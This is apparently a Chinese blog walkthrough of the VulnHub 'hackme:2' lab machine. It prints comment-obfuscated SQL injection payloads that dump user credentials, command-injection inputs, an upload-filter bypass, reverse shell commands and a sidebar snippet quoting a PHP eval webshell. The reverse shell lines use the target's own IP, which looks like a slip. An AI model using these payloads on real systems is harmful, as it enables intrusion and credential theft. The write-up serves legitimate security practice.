VulnHub-hackme:2漏洞利用流程

已于 2024-01-09 16:31:02 修改
阅读量128 收藏 1
点赞数
分类专栏: 靶机实操 文章标签: 网络安全 安全 web安全
于 2023-06-14 17:45:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76786857/article/details/131200292
版权

靶机地址

hackme:2~ VulnHub

hackme: 2 ~ VulnHub

靶机IP:192.168.245.131

测试机系统:kali、win10

测试机IP:192.168.245.129 

目录

0.环境搭建

1.信息收集

1.1主机发现

1.2端口扫描

1.3详细扫描

1.4gobuster进行目录扫描

1.5网站指纹识别

2.漏洞挖掘

sql注入

3.权限提升

3.1信息收集

3.2反弹shell

3.3提权成功

0.环境搭建

   1.下载并导入靶机
   打开vmware–文件–打开–hackme2-DHCP.ova

 2.查看网络适配器
将靶机网络适配器改为NAT模式

3.启动靶机
点击 ▶靶机,开启成功 

1.信息收集

1.1主机发现

arp-scan -l

1.2端口扫描

masscan --rate=100000 -p 0-65535 192.168.245.131

 发现目标靶机22端口和80端口开启

1.3详细扫描

nmap -T4 -sV -O -p 22,80 192.168.245.131

 

1.4gobuster进行目录扫描

gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.245.131 -t 30

 

1.5网站指纹识别

2.漏洞挖掘

sql注入

1. 进入主页发现是登录页面,没有用户名及密码,但是页面有注册链接,进行注册用户

 2.使用所注册的用户登陆成功

 3. 利用sqlmap进行测试是否具有sql注入漏洞,发现失败,进行手工注入

sqlmap -u 'http://192.168.245.131/welcome.php' --data="search=OSINT" --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9"  --level=3 --risk=3

输入All或者Linux可以查询到一些表中存在的书名

推测的查询语句为

$sql = " SELECT * FROM BOOKS WHERE book_name LIKE '".$input."%';"

因此构造测试语句

All%' and '123 ' like '1    # 正常回显

从这,我们可以判断这里存在注入点

 同时注意的是这需要用注释符代替空格,否则返回值为空

All%'/**/union/**/select/**/1,2,3'

使用 burp 抓查询数据包

All%'/**/union/**/select/**/1,database(),3'   # 数据库

All%'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'webapphacking   # 数据表

All%'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/'webapphacking'/**/and/**/table_name/**/like/**/'users        # 字段

All%'/**/union/**/select/**/1,group_concat(user),group_concat(pasword)/**/from/**/users/**/where/**/111/**/like/**/'1    # 用户名、密码

 

 通过在线的md5破解,可以得到管理员账号密码superadmin/Uncrackable

 

 发现了一个可以进行文件上传的点

 上传文件之后,页面上回显了上传路径

再次测试

First Name:0
Last Name:System('id')

 成功回显,发现命令执行漏洞,尝试进行反弹shell

kali开启监听端口

nc -lvvp 7777

输入反弹shell命令发现失败

First Name:0
Last Name:System('/bin/sh -i >& /dev/tcp/192.168.245.131/7777 0>&1')

 

 可以看到回显中将空格过滤掉了,这里添加特殊字符当空格也失败:

First Name:0
Last Name:System('/bin/sh${IFS}-i${IFS}>&${IFS}/dev/tcp/192.168.245.131/7777${IFS}0>&1')

换一种方法:

查看下文件welcomeadmin.php的源码看看能否找到上传的路径

First Name:0
Last Name:System('cat${IFS}welcomeadmin.php')

 

 

 发现文件目录存在:

/var/www/html/uploads/year2020/

访问目标:

http://192.168.245.131/uploads/year2020/shell.php

通过welcomeadmin.php的源码分析,发现对如下后缀进行了过滤

html

js

php

php3

php4

php5

尝试上传phtml后缀

访问http://192.168.245.131/uploads/year2020/shell.phtml发现页面没有任何回显

进行蚁剑连接

3.权限提升

3.1信息收集

3.2反弹shell

使用刚刚开启的kali端口反弹shell,执行如下命令进行反弹:

mknod a p; telnet 192.168.245.131 7777 0<a | /bin/bash 1>a

3.3提权成功

cd /home/legacy
ls
./touchmenot
id
su root
id

廾匸0705
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
hackme-2靶机渗透详解
大熊
06-12 332
这个靶机的难度适中,通过这个靶机的联系,感觉更可以增强自己对这些漏洞执行的连贯性,靶机主要考察了目录扫描,sql注入(这里要绕过空格过滤),文件上传与命令执行的结合,反弹shell及提权。该靶机可以串通各部分知识,值得一做。
vulnhub--hackme2-DHCP
weixin_45922278的博客
02-24 901
描述 “ hackme2”是中等难度级别的框。这是hackme系列的第二部分,其中更多的控制措施可以阻止恶意攻击。此外,您还必须开箱即用,以利用漏洞。目标是通过Web漏洞获得受限的特权访问,然后特权以root用户身份升级。该实验室的创建是为了模拟现实世界中的网络漏洞。 “ hackme2”使用DHCP并可能在mysqld自行关闭(非常罕见的情况)的情况下,尝试强制重启机器,并且随后应能正常工作。 https://idc.wanyunshuju.com/vul/1947.html 一、信息...
vulnhub----hackme2-DHCP靶机
woshicainiao666的博客
02-26 879
文件上传+命令执行漏洞结合
Hackme2靶机总结
qq_45301512的博客
12-17 344
(2) 先用最普通的测post的跑一下,发现不行,根据最后的提示,可以加上 –level 参数 和 –tramper=space2comment 参数。看了网上的答案,发现/home/legacy下存在一个touchmenot可执行文件,运行就能提权。使用msfvenom生成一个php的tiquan.php,上传到/var/www/html目录下。=eval 代替
web目录扫描工具汇总
A-MING的博客
08-23 3814
在渗透中,我们需要得到网站web服务器的路劲。如管理员后台,站点的敏感文件如(站点备份、数据库备份)等等。在kali中有很多这样的优秀工具,本文将为你一一介绍。
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
03-07
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并...
bugku ctf刷题2(php://input&kali-gobuster扫目录)
weixin_63231007的博客
05-14 1020
Cookies 网页与网页源代码里无有用信息 观察url里内容,发现filename存在base64加密,解密后发现是keys.txt。 尝试用 filename访问index.php(原url使用base64,这里也将index.php进行编码)。line没有传值,试着传1,2,3;发现回显类似与源代码。写个python脚本获取一下这个源代码。 得到源代码为: <?php error_reporting(0); $file=base64_decode(isset($_GET['f.
vulhub靶场学习日记hackme2
m0_55763479的博客
07-12 303
vulhub靶场学习日记hackme2
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 3505
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
漏洞payload 靶机_hackme:2 靶机攻略
weixin_42354108的博客
01-16 1043
原标题:hackme:2 靶机攻略 0x01 背景:hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!0x02 技术关键词:SQL注入、WAF Bypass、模糊测试、文件上传、suid提权0x03 靶机发现与...
edjpgcom制作一句话图片木马
刘启明
06-19 6844
将图片直接拖到edjpgcom.exe程序上 写入一句话木马 <?fputs(fopen("shell1.php","w"),'<?php @eval($_POST[caidao]);?>')?> 查看图片
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8286
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 927
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
《软件定义安全》之八:软件定义安全案例
最新发布
大龄IT民工
06-13 1086
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实现网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
NTFS安全权限
2302_80097039的博客
06-12 580
NTFS权限是基于。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

廾匸0705

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值